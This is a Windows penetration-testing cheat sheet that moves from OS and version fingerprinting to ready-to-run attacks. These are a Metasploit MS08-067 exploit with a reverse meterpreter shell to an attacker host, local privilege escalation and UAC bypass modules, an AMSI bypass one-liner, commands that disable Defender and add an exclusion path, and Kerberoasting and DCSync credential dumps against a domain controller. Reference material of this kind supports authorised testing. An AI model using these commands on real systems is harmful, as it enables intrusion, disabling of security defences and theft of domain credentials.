Windows Version Identification
Version Detection Methods
# Nmap OS detection
nmap -O target.com
# SMB version detection
nmap -p 445 --script smb-os-discovery target.com
# RDP version detection
nmap -p 3389 --script rdp-ntlm-info target.com
Windows Version Build Numbers
Windows XP
5.1 (Build 2600)
Windows 7
6.1 (Build 7600-7601)
Windows 10
10.0 (Build 10240+)
Windows 11
10.0 (Build 22000+)
Windows XP/Server 2003 (Legacy)
Known Vulnerabilities
Critical Legacy Vulnerabilities:
- MS08-067 (Conficker): RPC vulnerability
- MS03-026: DCOM RPC vulnerability
- MS04-011: LSASS vulnerability
- MS05-039: Plug and Play vulnerability
# MS08-067 exploitation
use exploit/windows/smb/ms08_067_netapi
set RHOST target.com
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker-ip
exploit
Windows 7/Server 2008
Common Attack Vectors
# MS10-015 (KiTrap0D)
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
exploit
# UAC Bypass - bypassuac
use exploit/windows/local/bypassuac
set SESSION 1
exploit
Windows 10/11/Server 2016+
Modern Security Features
Windows Defender ATP
Advanced threat protection
Device Guard
Application control policies
Credential Guard
Credential protection
Control Flow Guard
Memory corruption protection
Bypass Techniques
# AMSI bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Windows Defender bypass
powershell "Set-MpPreference -DisableRealtimeMonitoring $true"
powershell "Add-MpPreference -ExclusionPath 'C:\temp'"
Domain Controller Attacks
Active Directory Enumeration
# BloodHound data collection
bloodhound-python -u username -p password -ns dc-ip -d domain.com -c all
# Kerberoasting
impacket-GetUserSPNs domain.com/user:password -dc-ip dc-ip -request
# DCSync attack
impacket-secretsdump domain.com/user:password@dc-ip -just-dc-ntlm